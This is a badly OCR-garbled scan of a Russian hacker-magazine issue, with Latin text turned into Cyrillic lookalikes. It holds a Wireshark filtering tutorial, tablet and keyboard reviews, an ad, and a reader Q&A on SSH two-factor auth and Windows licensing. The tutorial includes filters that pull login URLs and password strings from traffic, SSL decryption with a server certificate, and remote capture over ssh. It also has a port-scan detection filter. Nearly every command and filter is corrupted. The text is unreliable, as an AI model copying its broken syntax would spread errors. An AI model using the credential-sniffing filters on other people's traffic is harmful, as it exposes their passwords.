ЕіІІег, ІРРігеѵѵаІІ (ірМ, МеіШег (ірІаЫез), Раскеі РіІІег (р{), а также 
ѴѴіпгіоѵѵз РігеѵѵаІІ ІпеІзЬ). 

И теперь кратко об азах фильтрации на сетевом уровне, основу 
которой составляют поля заголовка ІР-пакета — адрес отправите- 
ля (ір.згс) и адрес получателя (ір.сізі): 

(ір.згс == 192.168.56.6) 1) (ір.сІзТ == 192.168.56.6) 

Так мы увидим все пакеты, которые получил или отправил 
данный ІР-адрес. Фильтровать целые подсети можно, используя 
СШР-нотацию записи маски. Для примера выявим инфицирован- 
ный хост, осуществляющий спам-рассылку (здесь 192.168.56.251 — 
это ІР-адрес нашего БМТР-сервера): 

ір.згс == 192.168.56.0/24 апй Тср.сІзТрогТ == 25 апй - 
!(ір.гізТ == 192.168.56.251) 

К слову, для выборки по МАС-адресам следует использовать 
примитивы еіЬ.згс, еіЬ.сЫ и еіЬ.асМг. Порой проблемы сетевого 
уровня куда теснее связаны с ЕіЬегпеІ-уровнем, чем об этом по- 
вествует теория. В частности, при настройке маршрутизации очень 
полезно бывает посмотреть, на МАС-адрес какого роутера упрямый 
узел отправляет пакеты. Впрочем, для такой простой задачи 
за глаза хватит утилиты Ісрсіитр, практически штатной для ІІЬІІХ- 
подобных систем. 

С фильтрацией портов у ѴѴігезЬагк тоже никаких вопросов нет. 
Для ТСР к твоим услугам ключевые слова Іср.згсрогі, Іср.сізірогі 
и Іср.рогі, для ІІОР — исір.згсрогі, игір.сЫрогІ и исІр.рогЕ Правда, 
у встроенного языка фильтров ѴѴігезЬагк не нашлось аналога 
примитива рогі в Рсар, обозначающего как порт ІШР, так и ТСР. 

Но это легко исправить с помощью логического выражения, на- 
пример: 

Тср.рогТ ==53 || исІр.рогТ == 53 



Ріііег: (агр.орсосіе ед геріу) апсИагр.згс.ргоіо_ірѵ4 ед 192.168. ▼ 
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Рис. 3. Результат работы фильтра протокола АРР 




Рис. 4. Некоторые ІСМР-сообщения 
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ИМПРОВИЗИРУЕМ С НТТР-ТРАФИКОМ 



Прикладные протоколы, в частности НТТР, — это «вечная» тема 
в разрезе сниффинга. Справедливости ради нужно сказать, 
что для исследования веб-трафика создано немало специализиро- 
ванных программных средств. Но и такой универсальный инстру- 
мент, как ѴѴігезЬагк, с его гибкой системой фильтрации на этом 
поприще оказывается совсем не лишним. 

Для начала соберем немного веб-трафика, сходив на первый 
пришедший на ум сайт. Теперь поищем в сообщениях протокола 
ТСР, служащего транспортом для НТТР, упоминания любимого 
интернет-ресурса: 

Тер сопТаіпз "хакер. ги и 

Оператор сопіаіпз проверяет наличие подстроки в данном 
поле. Есть еще оператор таІсНез, в нем можно использовать РегІ- 
совместимые регулярные выражения. 

Окошко «РіІІег Ехргеззіопз», конечно, хороший помощник, но по- 
рой перелистывать длинный список в поисках нужного поля весьма 
утомительно. Есть более простой способ создания/модификации 
фильтров отображения — с помощью контекстного меню при про- 
смотре пакетов. Для этого нужно просто кликнуть правой клавишей 
мыши по интересующему полю и выбрать один из подпунктов пункта 
«Арріу Аз РіІІег» или пункта «Ргераге а РіІІег». В первом случае 
изменения тут же вступят в силу, а во втором — можно будет под- 
корректировать выражение. «5еІес1е(і» означает, что значение поля 
станет новым фильтром, «N 01 Зеіесіесі» — то же самое, только с от- 
рицанием. Пункты, начинающиеся с «...», добавляют значение поля 
к существующему выражению с учетом логических операторов. 



Комбинируя различные средства графического интерфейса 
ѴѴігезЬагк и знание особенностей протокола НТТР, можно легко 
детализировать до требуемого уровня отображение трафика в глав- 
ном окне программы. 

Например, чтобы посмотреть, какие именно изображения 
браузер запрашивал у веб-сервера при формировании страницы, 
сгодится фильтр, анализирующий содержимое передаваемого 
серверу ІІРІ: 

(ЫТр.ЬозТ ец "ыѵм. хакер. гіГ) апсі ((ЫЬр.гециезТ.игі — 
сопТаіпз "оре") ог (ЬТТр. гециезі.игі сопТаіпз ".рпЕ")) 

То же самое, но с использованием таІсЬез: 

(ЫЛр.ЬозТ ец "ммм. хакер. ги") апсі (НТТр. гециезТ . игі «-* 
таТсНез " ОРЕІ • РПЕ") 

Разумеется, поля сообщений протоколов разных уровней можно 
без особых проблем смешивать в одном выражении. Например, 
чтобы узнать, какие картинки данный сервер передал клиенту, 
используем исходный адрес из ІР-пакета и поле «Сопіепі-Туре» 
НТТР-ответа: 

(ір.зге ец 178.248.232.27) апсі (И«р. сопТеп1:_1:уре - 
сопіаіпз "ітаЕе") 

А с помощью поля НТТР-запроса «Реіегег» ты сможешь узнать, 
с каких еще серверов браузер берет контент при формировании 
страницы любимого сайта: 



(ИПр.геТегег ец "Іі«р://ммм. хакер. ги/") апсі (по* - 
(ір.сізі ец 178.248.232.27)) 

Рассмотрим еще несколько фильтров-полезняшек. Для вы- 
борки из трафика НТТР-запросов, сделанных методом 6ЕТ, можно 
использовать следующее выражение: 



ІтІЛр.геяиеБТ.теТЬосІ == СЕТ 

Именно на прикладном уровне фильтры отображения проявля- 
ют себя во всей красе и простоте. Для сравнения: чтобы, например, 
решить эту задачу с помощью Рсар, пришлось бы применить вот 
такую трехэтажную конструкцию: 

рогТ 80 апсі Тср[ ( (Тср[12 : 1] & 0хТ0) >> 2) : 4] = 0x47455420 



Чтобы выяснить, какие ѵѵѵѵѵѵ-подключения совершал пользова- 
тель хоста 192.168.56.8 в определенный интервал времени (скажем, 
Рис. 4. Модификация фильтра отображения на лету в обеденный перерыв), задействуем примитив ігате.іігпе: 
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Веъок/е Мате 



Беіесіегі 
Ыоі веіесіегі 

. 2 г 5еІесіе4 
.. ао<1 поі 5е1есіе<і 
ос поі 5еІесІе4 



/Рапсу2оот. )• і 
гРапсу2оотНТН-.І 
‘ -_Ьд.дИ I 



Соппесіюп: кеер- аіі ѵе\г\п 
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5ѴЫ/АСК 




$ ббЬ гоо1:@Ііоте.§ѵу/.ір.асІсІг ЧзЬагк 
апу -м - ' | мігезИагк -к -і - 
$ ббЬ гоо!@Ноте.§ы.ір.асІсІг !срсІитр 
рог! 22’ | мігезМагк -к -і - 



--Р "рог! ! 22" -і ^ 
-У -50 -И - ' ПО! *-< 



Рис. 7. Настройка 551-сертификата 




!ср.сІ5!рог! == 80 && -РгатеЧіте >= "Ѵап 9, 2013 4-« 
13:00:00" && *Ргате.!іте < "Ѵап 9, 2013 14:00:00" && «-< 
ір . 5ГС == 192.168.56.8 

Ну и отображение ІІРІ запросов, содержащих слова «Іодіп» 
и «изег», плюс «напоминалка» паролей: 

Ь!!р.гецие5!.игі та!сИе5 "Іо^іп. *=и5ег" 

(Ь!!р соп!аіп5 "раББмогсГ) || (рор соп!аіп5 "РА55") 



ПЕРЕХВАТ ББЬКОНТЕНТА 



Настоящий бич исследователя сетевого трафика — шифрование. 
Но если у тебя есть заветный файл с сертификатом (кстати, беречь 
его нужно как зеницу ока), то ты легко сможешь узнать, что прячут 
пользователи данного ресурса в 55(_-сессиях. Для этого нужно 
указать параметры сервера и файл сертификата в настройках про- 
токола 55І_ (пункт «Рге^егепсез» меню «Есііі», слева в списке про- 
токолов выбрать 551_). Поддерживаются форматы РКС512 и РЕМ. 

В последнем случае нужно убрать пароль с файла командами: 

ореп$5І ркс5І2 -ехрог! -іп зегѵег.рет -ои! аа.р-Рх 
орепзБІ ркс5І2 -іп аа.р-Рх -ои! БегѵегМоРаББ .рет -посіѳб 



АНАЛИЗИРУЕМ ТРАФИК С УДАЛЕННЫХ ХОСТОВ 



Пользователи ѴѴіпсіоѵѵб могут не только работать с интерфейсами 
того компьютера, на котором запущен ѴѴігезЬагк, но и снимать 
трафик с удаленных машин. Для этого существует специальная 
служба (Ретоіе Раскеі Саріиге Ргоіосоі) в поставке библиотеки 
ѴѴіпРсар. Ее нужно предварительно включить в оснастке управле- 
ния службами (зегѵісез.тзс). Теперь, запустив ѴѴігезЬагк на уда- 
ленном компьютере, можно подключиться к тому узлу, на котором 
работает сервис удаленного перехвата трафика (по умолчанию 
использует порт 2002), и данные по протоколу РРСАР потекут 
к тебе рекой. 

Также приведу варианты подключения к домашнему *піх- 
роутеру «извне» для удаленного анализа трафика: 



ЗАКЛЮЧЕНИЕ 



На фоне всеобщего увлечения компьютерного андеграунда вопро- 
сами безопасности сетевых приложений монументальные про- 
блемы нижележащих уровней постепенно уходят на второй план. 
Понятно, что сетевой и транспортный уровни изучены и исследо- 
ваны вдоль и поперек. Но беда в том, что специалисты, выросшие 
на 5СІІ_-инъекциях, межсайтовом скриптинге и инклудах, не подо- 
зревают об огромном пласте, скрытом под вершиной айсберга. 

Сниффер же, подобно отладчику и дизассемблеру, показывает 
детали функционирования системы в мельчайших подробностях. 
Установив ѴѴігезЬагк и проявив некоторую сноровку, ты сможешь 
увидеть сетевые взаимодействия, как они есть — в невинном, 
девственно обнаженном виде. И фильтры тебе в помощь! 31 



ІШЯ 

Извлечение трафика 
для мониторинга и 
отладки из сетевого 
трафика осущест- 
вляется пакетным 
фильтром. Пакетный 
фильтр входите 
состав ядра опера- 
ционной системы и 
получает сетевые 
пакеты от драйвера 
сетевой карты. 

Примерами пакет- 
ных фильтров для 
ЦЫІХ-Ііке ОС явля- 
ются ВРР (Вегкеіеу 
Раскеі РіІІег) и 1.5Р 
(Ыпих 5оске( РіІІег). 

В ВРР фильтра- 
ция реализована 
на основе регистро- 
ориентированного 
примитивного 
машинного языка, 
интерпретатором 
которого и является 
ВРР. 

ІУА7А71 

• Официальный сайт 
ѴѴігевЬагк: 

шт,ѵѵіге5Ьагк.огд; 

• ѵѵікі-страница, по- 
священная фильтрам 
отображения: 

ѵѵікі.ѵѵігез Ьагк.огд/ 

Рі$рІауРіІІег5: 

• страница гида 
№іге$Ьагк, посвя- 
щенная фильтрам 
отображения: 

доо.дІ/)'гсТІ: 

• ѵѵікі-страница, по- 
священная фильтрам 

Рсар: ./ікі.ѵѵігезНагк. 
огд/СарІигеРіІІег$; 

• библиотека Рсар 
и утилита Ісргіитр: 

ѵѵѵт.ісрсіитр.огд; 

• библиотека 
ШіпРсар: 

ѵтѵѵ.ѵѵіпрсар.огд . 






ИЗВЛЕЧЬ 
ПОЛЕЗНЫЙ ГРУЗ 

В определенных кругах широко 
известны специализированные 
инструменты, позволяющие «вы- 
таскивать» из трафика конечные 
информационные объекты: файлы, 
изображения, видео- и аудиокон- 
тент и прочее. Благодаря мощ- 
ной аналитической подсистеме, 
МгезЬагк эту функциональность 
с лихвой покрывает, поэтому ищи 
в соответствующих окнах анализа 
кнопку «Баѵе РауІоасІ...». 




ИНСТРУМЕНТ 
ИЗ РАЗРЯДА 
мизт НАѴЕ 



МгезЬагк — широко известный 
инструмент перехвата и интерак- 
тивного анализа сетевого трафика, 
фактически стандарт для про- 
мышленности и образования. 
Распространяется под лицензией 
бЬИ) 6РІ_ѵ2. ѴѴігезПагк работает 
с большинством известных про- 
токолов, имеет графический интер- 
фейс пользователя на основе 6ТК+, 
мощную систему фильтров трафика 
и встроенный интерпретатор языка 
программирования І_иа для соз- 
дания декодеров и обработчиков 
событий. 



РСАР-ФИЛЬТР ДЛЯ ВЫЯВЛЕНИЯ СКАНИРОВАНИЯ ЫЕТВІ05-П0РТ0В 

сіб! рог! 135 ог сіб! рог! 445 ог сіб! рог! 1433 апсі 1ср[1срЛае5] & (1ср-5уп) != 0 апсі !ср[!срЯа§5] & (Іср-аск) = 0 апсі бгс пе! 192.168.56.0/24 
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аІІзоА.ш® 



ПОДАРОК 



АІІзоН: — интернет-магазин лицензионного про- 
граммного обеспечения. С 2004 года АІІзоК предлага- 
ет покупателям более 15 000 программ от 3000 разра- 
ботчиков. АІІзоМ обеспечивает мгновенную доставку 
электронных копий (втечение Юминутпослеоплаты 
заказов) и физическую доставку коробочных версий 
по всей России и странам СНГ. Действует накопитель- 
ная система скидок, доступно 25 способов оплаты. 
Сайт интернет-магазина: аІІБоК.ги 
Тел.: 8 (495) 937-01-50 и 8 (800) 200-22-33 
Е-таіІ: БаІеБГдаІІзоК.ги 





Первые 30 читателей, оформивших подпискуна «Ха- 
кер» на 6 месяцев в период с 28 февраля по 20 марта, 
получатсертификат АІІзоК номиналом 500 рублей. 
Сертификатможно использовать для покупки про- 
грамм и игр. 



на сумму 

1000 

рублей 



Чтобы обменять сертификат 
на программы или игры и) каталога АПюй. 
напишите на адрес мІе^&аІЬо^тц 
и укажите номер сертификата 



Первые 20 читателей, оформивших подпискуна «Ха- 
кер» на 12 месяцев в период с 28 февраля по 20 марта, 
получатсертификатАІІзоК номиналом 1000 рублей. 
Сертификатможно использовать для покупки про- 
грамм и игр. 




166 рублей 
за номер! 

Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшие совесть рас- 
пространители нестесняются продаватьжурнал за 350 
рублей и дороже. Во-вторых, это удобно. Не надо искать 
номер в продаже и бояться, что весьтиражуже разберут. 
В-третьих, это шанс получить сертификат на покупку в ин- 
тернет-магазине АІІзоК.ги! 




ПОДПИСКА 

6 месяцев 1110 р. 
12 месяцев 1999 р. 






Ьир://5Ьор.дІс.ги 



Ѵ/5А фВ | Й О 



8 (800) 200-3-999 (бесплатно) 

5иЬ5сгіЬе0дІс.ги 





РЕРРІІМ 



Екатерина Михеева-Капанжа 




51ІРР 

РС9716В 




ланшеты теперь у всех и повсюду — даже бедным 
африканским детишкам их иногда подкидывают 
в качестве гуманитарной помощи, так сказать, 
в образовательных целях. Но у нас дела обстоят лучше, 
покупательская способность выше, поэтому планшеты 
уже прочно вошли в жизнь простого россиянина, особен- 
но молодого. Рынок планшетных ПК развивается мол- 
ниеносно, открывая выбор небывалых размеров. Одна 
из ключевых причин всей этой кутерьмы — стремительно 
падающая планка нижней цены. Сегодня мы рассмотрим 
российское устройство, которое можно купить за 6000 
рублей,— 30 РС9716В. 

Первое, что бросается в глаза (и чего никак не ожида- 
ешь получить за такую цену), — это яркий дисплей с ІР5- 
матрицей с поддержкой до 10 точек касания. Диагональ 
в 9,7 дюйма достаточно типична — производитель пошел 
по протоптанной дорожке. Планшет, попавший к нам 
на тест, «одет» в серебристый перламутровый корпус, 
причем сзади он покрыт слоем прозрачного пластика, 
немного напоминающего стеклянную оболочку. Вообще 
доступны три цвета задней крышки: бронзовый метал- 
лик, серебристый металлик или темно-серый металлик. 

На ребрах планшета много механических кнопок: 
клавиша включения (на нижнем торце), клавиша «Меню» 
и качели громкости (слева), клавиша «Домой» (сверху). 

На нижнем торце также расположен разъем для науш- 
ников, а сверху — два динамика. На верхнем же ребре 
находятся и остальные разъемы: для зарядки, тісгоІІБВ 
и слот для карт памяти тісгоБб. 

В комплекте ты найдешь защитную пленку, которая, 
кстати, уже наклеена на планшет, зарядное устройство, 
наушники и два провода 115В: первый — переходник 
с тісгоІІ5В-Іо-ІІ5В для подключения к компьютеру, 




а второй тоже переходник с тісгоІІБВ, но уже ОТО, 
для подключения всякого рода флешек к планшету. 

О поддержке ІІ5В-модемов на сайте производителя ниче- 
го не сказано, но нам удалось подключить модель Ниаѵѵеі 
Е173. К сожалению, списка поддерживаемых Зб-модемов 
нет, в каждом конкретном случае придется проверять 
методом проб и ошибок. Однако сам факттого, что инет 
может быть доступен не только через ѴѴі-Рі, радует. 

Основу 30 ВС9716В составляет 5оС ВоскСЫр ВК2918 
с тактовой частотой 1 ГГц, построенная на базе одного 
АРМ СоПех-А8. Данная 5оС отличается достаточно низ- 
ким энергопотреблением и позиционируется как первая 
в мире однокристальная система, в которой полностью 
аппаратно реализован декодер РиІІ НО видео. В роли 6РІІ 
в системе на кристалле выступает графическое ядро 
Ѵіѵапіе 6С800, поддерживающее ОрепбІ. Е5 2.0 и Ореп Ѵб. 
К сожалению, ВоскСЫр ВК2918 не назовешь «супер-пу- 
пер» производительной системой, однако для удовлетво- 
рения базовых потребностей современного Ьото заріепз 
(серфинга в интернете, простеньких Зй-игр и просмотра 
американских комедий) вполне хватит. 

выводы 

Главная фишка 30 ВС9716В — качественная 
ІР5-матрица в совокупности с низкой стоимостью. По- 
нятно, что при этом чем-то придется поплатиться, в дан- 
ном случае производительностью (она средненькая). 
Устройство может быть идеальным подарком (особенно 
самому себе) — цена вроде игрушечная, а планшет более 
чем настоящий, практически ничем не уступающий более 
«взрослым» и дорогим конкурентам. А еще забавно и до- 
статочно свежо смотрится модель с золотистой задней 
крышкой. □□ 



Н ВИЯЬ/і 

Операционная система: Апсігоісі 
Ісе Сгеат БапгіѵѵісЬ (4.0.4) 
Дисплей: 9.7", 1024x 768, 
технология ІР5, мультитач 
до 10 точек касания 
Процессор: ВоскСЫр ВК2918, 
СогІех-А8, 1 ГГц (графический 
процессор Ѵіѵапіе 6С800) 

КАМ: 1 Гб. ЭОРЗ 
Встроенная память: 8 Гб 
Камеры: 2 мегапикселя 
(фронтальная), 2 мегапикселя 
(тыловая) 

Аккумулятор: Ы-роІ. 3600 мА ч 

Беспроводные сети: ѴѴі-Рі 
802.1 1 Ь/д/п 

Разъемы: тісгоІІБВ, 3,5 мм (мини- 
джек), слот тісгоБО 

Дополнительно: встроенные 
динамики (стерео), микрофон, 
6-сенсор 

Габариты: 243 х 190 х 9,4 мм 
Вес: 641 г 

Комплектация: планшет, кабель 
0Т6 (115В — тісгоІІБВ), кабель 
115В, зарядное устройство, 
наушники, защитная пленка 




АпТиТи ВепсЬтагк ѵ. 3.1.1 
СРІІ в целом: 736 баллов 
РАМ: 623 балла 
ЦП с целыми числами: 586 
ЦП с плавающей запятой: 150 
20-графика (768 х 976): 284 
Зй-графика (768x976): 903 
Ввод/вывод базы данных: 290 
Запись на карту 51): 77 (7,7 Мб/с) 
Чтение с карты Бй: 202 (>50 Мб/с) 
Общая оценка: 31 15 баллов 
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РЕМНЖ 



Екатерина Михеева-Капанжа 



ГЕЙМИНГ В СТИЛЕ Х7! 

Возможно ли приобрести хорошую игровую клавиатуру и уложиться при этом в достаточно скромную 
сумму? Компания А4ТесЬ уверяет, что можно, и представляет на суд покупателя клавиатуры Х7-6800 
и Х7-6100. Если первое устройство — типичный представитель класса игровых клавиатур с «геймерски- 
ми» и мультимедиаклавишами, то второе — это скорее дополнение к обычной (например, офисной) 
клавиатуре, этакий игровой блок, оснащенный лишь самыми необходимыми элементами управления. 




А4ТЕСН Х7-6800 



В комплекте с клавиатурой можно найти дополнительные клавиши для замены наиболее изнашиваемых в руках «труш- 
ного» геймера — ѴѴА5Р и стрелки, а для того, чтобы замена происходила легко и безболезненно, — специальный пинцет. 
Эти же кнопки на самой клавиатуре прорезиненные, они яркого красного цвета. 

С правой стороны от цифрового блока расположено семь мультимедиакнопок, а над ними находится переключатель 
скоростей клавиатуры. Всего предусмотрено четыре режима скорости: обычный, ускоренный, быстрый и турбо. В макси- 
мально быстром последнем режиме время отклика составляет 7,92 мс. 

Клавиша пробела раза в два короче стандартной, ей пришлось «по- 
тесниться», а на отвоеванной территории расположились дополнительные 
клавиши (с литерой 6). Еще несколько блоков с С-клавишами расположены 
под пробелом, над клавишами управления курсором и слева от алфавитно- 
цифрового блока — всего геймерских клавиш 15. 

Подставка под запястья «пупырчатая», чтобы руки не соскальзывали. 
Насколько приятен подобный массаж при длительном использовании — 
вопрос спорный. Производитель заверяет, что клавиатура полностью 
водонепроницаемая. Честно говоря, проверять это мы не рискнули, просто 
поверили на слово, хотя в Сети можно найти ролик, в котором счастливый 
обладатель моет А4ТесЬ Х7-6800 с мылом (!) под струей воды. 




А4ТЕСН Х7-6100 

Вторая клавиатура, которую мы сегодня рассматриваем, — это и не клавиатура вовсе, 
по крайней мере в привычном значении этого слова. Но она пригодится как «профессиональ- 
ное» дополнение к обычной клавиатуре. А4ТесЬ Х7-6100 включает в себя лишьте клавиши 
из стандартной клавиатуры, которые используются в играх, а также кнопки регулировки 
громкости. В общем, расположение клавиш непривычное: например, <5ЫК> находится напро- 
тив <А>, клавиши расположены не в шашечном порядке, как на обычной клавиатуре, а аккурат 
друг под другом, а функциональные клавиши — попарно. Стандартные клавиши управления 
(ѴѴА50) такие же прорезиненные и кричаще-красные, как и у А4ТесЬ Х7-6800. 

Интересна комплектация устройства, так как помимо мини-клавиатуры в коробке ты най- 
дешь еще несколько приятных бонусов. Во-первых, это чехол для переноски игрового блока 
с кармашком, в который при желании можно поместить средних размеров мышку. Во-вторых, 
вместе с клавиатурой поставляются сменные промаркированные панельки, на которых под- 
писаны команды для таких игр, как Соипіег-Зігіке, ВаНІеЛеМ, СаІІ о* Эиіу и НаК Ы(е 2. 

Да, А4ТесЬ Х7-01 00 не назовешь ультрановинкой, однако то, что она находит своих по- 
купателей на протяжении уже нескольких лет, может служить косвенным доказательством 
ее актуальности и востребованности и на сегодняшний день. 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



Интерфейс: 115В, проводная 
Габариты: 200,3 * 190 * 20,5 мм 

Число клавиш: 62 
Тип клавиатуры: мембранная 
Дополнительно: четыре 
сменные игровые панели, 
увеличенный вес, 
водонепроницаемость 



ВЫВОДЫ 

А4ТесН Х7-6800 и А4ТесЬ Х7-6100 привлекают в первую очередь ценой, 
но это далеко не главные их достоинства. Обе клавиатуры водонепро- 
ницаемы. Даже если у тебя нет привычки брать с собой комп в ванную, 
то эта особенность все равно будет полезна, ведь разлить кофе во время 
игры может каждый. Если первая клавиатура — гибрид офисной, игровой 
и мультимедиа (в общем-то, как большинство представителей рынка), 
то вторая исключительно игровая, она будет дополнением к основной. 
Кстати, как раз вместе они составят идеальный геймерский комплект! ш 




Интерфейс: Р5/2, 115В 
Число клавиш: 104 
Дополнительные клавиши: 22 
Тип клавиатуры: мембранная 
Время отклика: 7,92 мс 
Дополнительно: четыре 
скоростных режима, 
водонепроницаемость 
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Роман Гоций Ідоізііготапйдтаіі.сот) 



РАО 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аЯЕАІ..ХАКЕР.І№ 



Хочу написать на РуІЬоп'е линукс- 
демон, который будет мониторить 
страницу в интернете на наличие изменений 
и уведомлять меня о каждом изменении. 

Как бы ты сделал это? 

Основу демона можно взять готовую — 
в Сети их полно. Я бы рекомендовал 
посмотреть на вот эту основу: ЬіІ.Іу/ 
Р уіЬопРеатоп . Предельно простой и красивый 
РуіЬоп-код. Для вывода уведомлений, если 
работаешь под ІІЬипІи, можно использовать 
библиотеку ІіЬпоМу. Выполни из питона 
(с помощью виЬргосезз, например) системную 
команду: 

поііі-ру-зепсі "Ме55абе -Сех-С" 

Чтобы запустить созданный демон, сначала 
сделай ру-файл исполняемым и выполни: 

$ руСЬоп 1е5І:сІеатоп.ру з*аг* 

Как защититься от атак типа МІТМ, 
основанных на использовании зло- 
умышленниками поддельных сертификатов? 

На данный момент средств защиты 
от подобного рода атак нет, но на рассмо- 
трение в комитет ІЕТР внесена альфа-версия 
стандарта, который частично решает проблему. 



Стандарт определяет легковесное дополнение 
к протоколу ЦБ — ТАСК (Тгизі АввегИопз (ог 
СегІіГісаІе Кеуз). Суть этого дополнения состоит 
в том, что браузер может запомнить информа- 
цию о сертификатах сайта, которая в дальней- 
шем будет использована для определения 
подлинности сертификата. Владелец сайта 
имеет возможность сгенерировать пару 
ТАСК-ключей: приватный и публичный. 
Приватный ключ используется для подписи 
публичного И5-ключа сервера, а публичный 
при некоторых условиях посылается клиенту, 
и служит он для проверки подписи ЦБ-ключа. 
Вся соль в том, что браузер может привязать 
публичный ключ к определенному доменному 
имени. Если после привязки атакующий 
попробует осуществить МІТМ-атаку, используя 
поддельный сертификат, у него ничего 
не получится, так как ТАСК-валидация 
провалится. Этот стандарт может позволить 
организовать новый слой защиты 55І_, который 
делает возможным провести атаку только в том 
случае, если скомпрометирован и центр 
сертификации, и веб-сайт. 

Последняя доступная прошивка 
для моего смартфона Батзипд Ѳаіаху У 
(55360) — Апсігоісі 2.3. Где найти, если 
она вообще существует, прошивку поновее? 



Для твоего девайса 2.3 — это последняя 
официальная прошивка, и сомневаюсь, 
что самсунги предоставят для этого аппарата 
версию постарше, — оперативки там малова- 
то. Но существует множество послепродажных 
прошивок на базе Апсігоісі (например, 
СуаподепМосі или МІІІІ). Разные версии этих 
прошивок портируются энтузиастами под 
всевозможные девайсы. Что касается Ѳаіаху У, 
то стабильных прошивок на базе Апсігоісі ІС5 
я не встречал, хотя тут: ЬіІ.Іѵ/СМ9-б> ведется 
порт СуаподепМосі 9 (на базе ІС5). 

Устроился на новую работу. В организа- 
ции на компьютерах установлена 
корпоративная Мпсіоѵѵб 7 х64. Лицензии 
закуплено две, соответственно, некоторые 
компьютеры идут с одной лицензией, 
а остальные — с другой. Мне нужно узнать, 
какая лицензия установлена на каждом 
из компьютеров. От прежнего айтишника 
никаких записей не осталось, бухгалтерия 
не в курсе. Программы, которые должны 
показывать ключ продукта, выводят вместо 
него хлам. Как быть? 

Ты не можешь увидеть ключ продукта, 
потому что на корпоративной винде это 
сделать невозможно. Хочу предложить тебе 
распознать компьютеры по последним 











ДВУХЭТАПНАЯ 55Н-АВТ0РИЗАЦИЯ С ПОМОЩЬЮ ОООСЬЕ АІЛНЕЫТІСАТОВ 



С каждым днем двухэтапная авториза- 
ция становится все популярнее. Интер- 
нет-сервисы один за другим внедряют 
ее поддержку на свои сайты, поскольку 
такой способ авторизации предельно 
прост и при этом обеспечивает высокую 
безопасность. Сильный толчок к столь 
бурному развитию этой технологии дал 
Гугл. Благодаря опенсорсной разработ- 
ке под названием боодіе АиіЬепІісаІог 
ІЬі Ыу/боодІеАиЩ ) двухэтапную 
авторизацию можно прикрутить почти 
к чему угодно. Давай обезопасим с ее 
помощью свой ББН. 



Для внедрения двухфакторной 
авторизации с помощью боодіе 
АиіЬепІісаІог мы воспользуемся РАМ- 
модулем от боодіе (РАМ-модули позволяют 
легко внедрить разные формы авторизации 
в *піх-системе]. Установить его можно так: 



$ зисіо арТ-§еТ іпзТаІІ «-< 
НЬрат-еоо^Іе-аиТІіепІіісаТог 

Но если в репозиториях твоей системы дан- 
ного пакета не окажется, то можешь скачать 
отсюда Ьіі.іѵ/да боѵ исходные коды и ском- 
пилировать модуль под свою платформу. 



После того как мы установили модуль, 
нужно сгенерировать аутентификаци- 
онный ключ. Залогинься под юзером, 
из-под которого будешь входить удаленно, 
и выполни: 



$ §оо§1е-аи1:ЬепТісаТ:ог 

Программа тут же сгенерирует ключ и запас- 
ные коды, после этого запросит разрешение 
на обновление твоего боодіе АиіНепІісаІог 
файла — разрешаем. Дальше последуют еще 
несколько вопросов, касающихся безопаснос- 
ти, — отвечай на свое усмотрение. 
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Вопросы и ответы 



четырем знакам лицензии, которые можно 
получить с помощью команды зІтдг.ѵЬз /сііѵ. 
Для небольшой автоматизации выполни 
на каждом компьютере такой скрипт: 



УДОБНЫЙ ТРАНСФЕР МЕЖДУ 
ОБЛАЧНЫМИ ХРАНИЛИЩАМИ 



(ЭЕсЬо О-Р-Р 

Рог /Р 'Чокеп5=2 сІе1ітз=: " %%і - 
Іп ( ' с 5С гірТ %міпйіг%\5уз1:ет32Ѵ^ 
5Іт§г.ѵЬ$ /сПѵ л | РіпсІ "РагТіаІ Ргосіис* ♦-« 
Кеу : " ' ) Оо 5еТ к=%%і 
ЕсИо %СОМРІЯЕКМАМЕ% - %к: =% >> - 
%СОМРІІТЕРМАМЕ%. Тхі: 



Теперь файл можно скопировать по сети 
на твой ПК. Замени "Рагііаі Ргосіисі Кеу" 
на "Частичный ключ продукта", если у тебя 
русская винда. 



□ С рабочего стола Мпсіоѵѵз 7 я убрал 
панель задач. Вместо нее установил 
стороннюю анимированную панель задач, 
но из этой панели не могу «развернуть» трей, 
то есть нет доступа к свернутым в трей 
приложениям. Как развернуть это окошко 
с помощью ярлыка? 

□ Быстрее и легче всего решить твою 
задачу можно, используя программы 
типа Аиіоіі или АиІоНоіКеу. С их помощью 
нужно написать скрипт, «нажимающий» 
комбинацию клавиш <\Л/іп + В> и потом <ЕпІег> 
(эта последовательность как раз сделает то, 
что тебе нужно). Например, на Аиіоіі этот 
скрипт будет выглядеть так: 



зепсІ(”#и") 

; или зепсі ( "#6” ) ^ если по умолчанию 
; английская раскладка 
зепаСЧЕМТЕК}") 



Теперь этот скрипт можно скомпилировать 
с помощью Аиіоіі Бсгірі іо ЕХЕ Сопѵепіег. 



□ В процессе разработки моего Заѵа- 
проекта мне понадобился І_РУ-кеш. 
Какие готовые решения предоставляет Заѵа 
для его реализации? 




СУЩЕСТВУЕТ ЛИ СПОСОБ ПЕРЕСЫЛКИ ФАЙЛОВ МЕЖДУ 6РОРВОХ 
И 60061-Е 6ВІѴЕ, ТОЛЬКО ЧТОБЫ ПОПРОЩЕ? 



□ Если тебе нужен легкий и понятный интерфейс без лишних настроек, тогда 
хорошим выбором будет онлайн-сервис тѵЬаскирЬох.сот . Он позволяет 
пересылать файлы между самыми популярными облачными хранилищами. 
Кроме того, поддерживаются РТР, 5РТР и Му501_. В приватном бета-тестировании 
также доступны другие облачные хранилища и сервисы, среди них: Ѵап(1ех.0І5к, 
Рісаза, МогсІРгезг, БЬагеРоіпІ, Васкир Вох СІоисІ. Сервис позволяет легко настроить 
повторяемость операций копирования. Интерфейс сервиса очень прост — разберет- 
ся даже ребенок. На бесплатном аккаунте ты сможешь перекачивать до 10 Гб в ме- 
сяц: максимум по гигабайту за подход десять раз в месяц. Если тебе нужно больше, 
то придется заплатить. Платный аккаунт, кроме того, позволяет копировать только 
изменившиеся файлы, что сэкономит трафик. 



№ Ьаскир 



догѵ^отлп Зухплі сот 5сЬ«<до*! Тгал$(г? 



Ргогл СоодІеОгіѵе 

А доодіе Цпѵе 



4% ( оопгч ІгчЯ 



I ѵггутКіпд :*)о» <*а (к імпіЬпгб' 

I / 



То ОгорЬох 

** ОгорЬох 



АісИіѵе ап<1 птеяатр Ли* вап&Іеі 



I г 



- ОГ - 

ЗсЬебціе (гаге** 



1 ♦ 

